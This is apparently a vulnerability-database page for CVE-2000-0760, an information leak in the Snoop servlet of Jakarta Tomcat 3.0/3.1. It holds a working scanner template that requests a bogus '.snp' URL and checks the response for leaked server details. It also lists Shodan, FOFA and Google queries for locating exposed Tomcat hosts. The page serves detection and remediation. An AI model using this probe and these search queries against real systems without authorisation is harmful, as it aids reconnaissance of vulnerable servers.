CVE-2000-0760: Jakarta Tomcat 3.1 and 3.0 - Information Disclosure

2025-08-01 Jakarta Tomcat PoC Public

Description

Jakarta Tomcat 3.1 and 3.0 under Apache contain a vulnerability in the Snoop servlet that reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension, exploit requires remote access.

PoC

id: CVE-2000-0760

info:
  name: Jakarta Tomcat 3.1 and 3.0 - Information Disclosure
  author: Thabisocn,0x_Akoko
  severity: medium
  description: |
    Jakarta Tomcat 3.1 and 3.0 under Apache contain a vulnerability in the Snoop servlet that reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension, exploit requires remote access.
  impact: |
    Attackers can retrieve sensitive system information, potentially aiding further attacks or information disclosure.
  remediation: |
    Update to the latest version of Jakarta Tomcat or apply security patches that fix the Snoop servlet issue.
  reference:
    - https://www.exploit-db.com/exploits/20132
    - https://nvd.nist.gov/vuln/detail/CVE-2000-0760
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
    cvss-score: 6.4
    cve-id: CVE-2000-0760
    epss-score: 0.62496
    epss-percentile: 0.99146
    cpe: cpe:2.3:a:apache:tomcat:3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: tomcat
    shodan-query:
      - cpe:"cpe:2.3:a:apache:tomcat"
      - http.component:"apache tomcat"
      - product:"tomcat"
    fofa-query:
      - body="apache tomcat"
      - body="jk status manager"
    google-query:
      - site:*/examples/jsp/snp/snoop.jsp
      - intitle:"apache tomcat"
  tags: cve,cve2000,jakarta,tomcat,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/examples/jsp/snp/anything.snp"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Request Information"
          - "Path info"
          - "Server name"
          - "Remote address"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022060c84305959dca08a158e9c86cbad6367e04b3f675c3145658f0068d6ce9a67e02206842d2120ca0d0fecdebea0d7613ff42c028a021c90dbec20227aae3b0dbe275:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities